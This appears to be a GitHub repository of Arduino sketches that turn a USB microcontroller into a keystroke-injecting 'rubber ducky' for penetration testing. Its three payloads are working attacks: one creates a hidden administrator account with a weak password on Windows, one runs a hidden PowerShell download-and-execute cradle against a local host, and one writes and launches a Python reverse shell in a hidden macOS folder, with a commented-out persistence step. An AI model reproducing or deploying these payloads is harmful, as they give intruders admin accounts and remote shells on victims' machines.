├── README.md
├── .gitattributes
├── .gitignore
├── LICENSE
├── AddAdmin_Payload
    └── AddAdmin_Payload.ino
├── ReversePowershell_Payload
    └── ReversePowershell_Payload.ino
└── MacOSX_ReverseShell
    └── MacOSX_ReverseShell.ino


/README.md:
--------------------------------------------------------------------------------
 1 | # ArduinoDuckyScript
 2 | Various arduino script with rubber ducky like payload
 3 | 
 4 | Tested with:
 5 | - https://www.ebay.com/itm/New-Mini-ATMEGA32U4-Module-Board-Compatible-For-Arduino-SS-Micro-ATMEGA32U4-/272471577633?hash=item3f70925421
 6 | 
 7 | Blog:
 8 | 
 9 | https://medium.com/@christoferdirk/penetration-testing-with-arduino-build-your-own-usb-payload-9fd0902ef8fc
10 | 


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # Windows shortcuts
18 | *.lnk
19 | 
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 | 
24 | # OSX
25 | # =========================
26 | 
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 | 
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 Christofer Simbar
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/AddAdmin_Payload/AddAdmin_Payload.ino:
--------------------------------------------------------------------------------
 1 | #include <HID.h>
 2 | #include <Keyboard.h>
 3 | 
 4 | // Init function
 5 | void setup()
 6 | {
 7 |   // Start Keyboard and Mouse
 8 |   Keyboard.begin();
 9 | 
10 |   // Start Payload
11 |   // press Windows+X
12 |   Keyboard.press(KEY_LEFT_GUI);
13 |   delay(1000);
14 |   Keyboard.press('x');
15 |   Keyboard.releaseAll();
16 |   delay(500);
17 | 
18 |   // launch Command Prompt (Admin)
19 |   typeKey('a');
20 |   delay(500);
21 | 
22 |   // klik "Yes"
23 |   Keyboard.press(KEY_LEFT_ALT);
24 |   delay(500);
25 |   Keyboard.press('y');
26 |   Keyboard.releaseAll();
27 |   delay(500);
28 | 
29 |   // add user
30 |   Keyboard.println("net user /add Arduino 123456");
31 |   typeKey(KEY_RETURN);  
32 |   delay(100);
33 | 
34 |   // make that user become admin  
35 |   Keyboard.print("net localgroup administrators Arduino /add");
36 |   typeKey(KEY_RETURN);
37 |   delay(100);
38 | 
39 |   Keyboard.print("exit");
40 |   typeKey(KEY_RETURN);  
41 |   // End Payload
42 | 
43 |   // Stop Keyboard and Mouse
44 |   Keyboard.end();
45 | }
46 | 
47 | // Unused
48 | void loop() {}
49 | 
50 | // Utility function
51 | void typeKey(int key){
52 |   Keyboard.press(key);
53 |   delay(500);
54 |   Keyboard.release(key);
55 | }
56 | 
57 | 


--------------------------------------------------------------------------------
/ReversePowershell_Payload/ReversePowershell_Payload.ino:
--------------------------------------------------------------------------------
 1 | // Reverse Powershell Payload
 2 | // Target OS: Windows 7
 3 | 
 4 | #include <Keyboard.h>
 5 | #include <HID.h>
 6 | 
 7 | // Init function
 8 | void setup()
 9 | {
10 |   // Start Keyboard
11 |   Keyboard.begin();
12 | 
13 |   delay(2000);
14 | 
15 |   // Start Payload
16 |   Keyboard.press(KEY_LEFT_CTRL);
17 |   delay(1000);
18 |   Keyboard.press(KEY_ESC);
19 |   delay(1000);
20 |   Keyboard.releaseAll();
21 | 
22 |   // type CMD
23 |   Keyboard.print("cmd");
24 | 
25 |   Keyboard.press(KEY_LEFT_CTRL);
26 |   delay(1000);
27 |   Keyboard.press(KEY_LEFT_SHIFT);
28 |   delay(1000);
29 |   Keyboard.press(KEY_RETURN);
30 |   delay(1000);
31 |   Keyboard.releaseAll();
32 |   delay(500);
33 | 
34 |   // klik "Yes"
35 |   Keyboard.press(KEY_LEFT_ALT);
36 |   delay(1000);
37 |   Keyboard.press('y');
38 |   delay(1000);
39 |   Keyboard.releaseAll();
40 |   delay(1000);
41 | 
42 |   // execute reverse shell payload with powershell  
43 |   Keyboard.print("powershell -windowstyle hidden \"[system.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.21/shell.txt')\"");
44 |   typeKey(KEY_RETURN);
45 | 
46 |   // End Payload
47 | 
48 |   // Stop Keyboard
49 |   Keyboard.end();
50 | }
51 | 
52 | // Unused
53 | void loop() {}
54 | 
55 | // Utility function
56 | void typeKey(int key){
57 |   Keyboard.press(key);
58 |   delay(500);
59 |   Keyboard.release(key);
60 | }
61 | 
62 | 


--------------------------------------------------------------------------------
/MacOSX_ReverseShell/MacOSX_ReverseShell.ino:
--------------------------------------------------------------------------------
 1 | #include <Keyboard.h>
 2 | 
 3 | void setup() {
 4 |   Keyboard.begin();
 5 | 
 6 |   /* PAYLOAD START */
 7 |   delay(3000);
 8 | 
 9 |   // open utilities folder and launch the terminal lab
10 |   Keyboard.press(KEY_LEFT_GUI);
11 |   delay(1000);
12 |   Keyboard.press(' ');
13 |   Keyboard.releaseAll();
14 |   delay(500);
15 | 
16 |   Keyboard.print("terminal");
17 |   delay(1000);
18 |   typeKey(KEY_RETURN);
19 |   
20 |   // create hidden directory
21 |   Keyboard.print("cd ~");
22 |   typeKey(KEY_RETURN);
23 |   Keyboard.print("mkdir .OSXhelper");
24 |   typeKey(KEY_RETURN);
25 |   Keyboard.print("cd .OSXhelper");
26 |   typeKey(KEY_RETURN);
27 | 
28 | 
29 |   // write a python reverse shell script
30 |   // replace IP Address with your attacking machine
31 |   Keyboard.print("echo \"python -c 'import socket,subprocess,os;");
32 |   Keyboard.print("s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);");
33 |   Keyboard.print("s.connect((\\\"192.168.1.2\\\",4444));");
34 |   Keyboard.print("os.dup2(s.fileno(),0);");
35 |   Keyboard.print("os.dup2(s.fileno(),1);");
36 |   Keyboard.print("os.dup2(s.fileno(),2);");
37 |   Keyboard.print("p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\" > helper.sh");
38 |   typeKey(KEY_RETURN);
39 | 
40 |   // adjust script permission and execute the script
41 |   Keyboard.print("chmod +rwx helper.sh");
42 |   typeKey(KEY_RETURN);
43 |   
44 |   // comment out these lines are for persistence attack
45 |   //Keyboard.print("launchctl submit -l yes -p ~/.OSXhelper/helper.sh");
46 |   //typeKey(KEY_RETURN);
47 |   
48 |   Keyboard.print("./helper.sh &");
49 |   typeKey(KEY_RETURN);
50 |   delay(500);
51 | 
52 |   // close the terminal window
53 |   Keyboard.print("exit");
54 |   typeKey(KEY_RETURN);
55 |   delay(500);
56 | 
57 |   Keyboard.press(KEY_LEFT_GUI);
58 |   delay(1000);
59 |   Keyboard.press('q');
60 |   Keyboard.releaseAll();
61 |   delay(500);  
62 | 
63 |   Keyboard.press(KEY_LEFT_GUI);
64 |   delay(1000);
65 |   Keyboard.press('w');
66 |   Keyboard.releaseAll();
67 |   delay(500);  
68 |   /* PAYLOAD END */
69 |   
70 |   Keyboard.end();
71 | }
72 | void loop() {}
73 | 
74 | void typeKey(int key){
75 |   Keyboard.press(key);
76 |   delay(500);
77 |   Keyboard.release(key);
78 | }
79 | 
80 | 


--------------------------------------------------------------------------------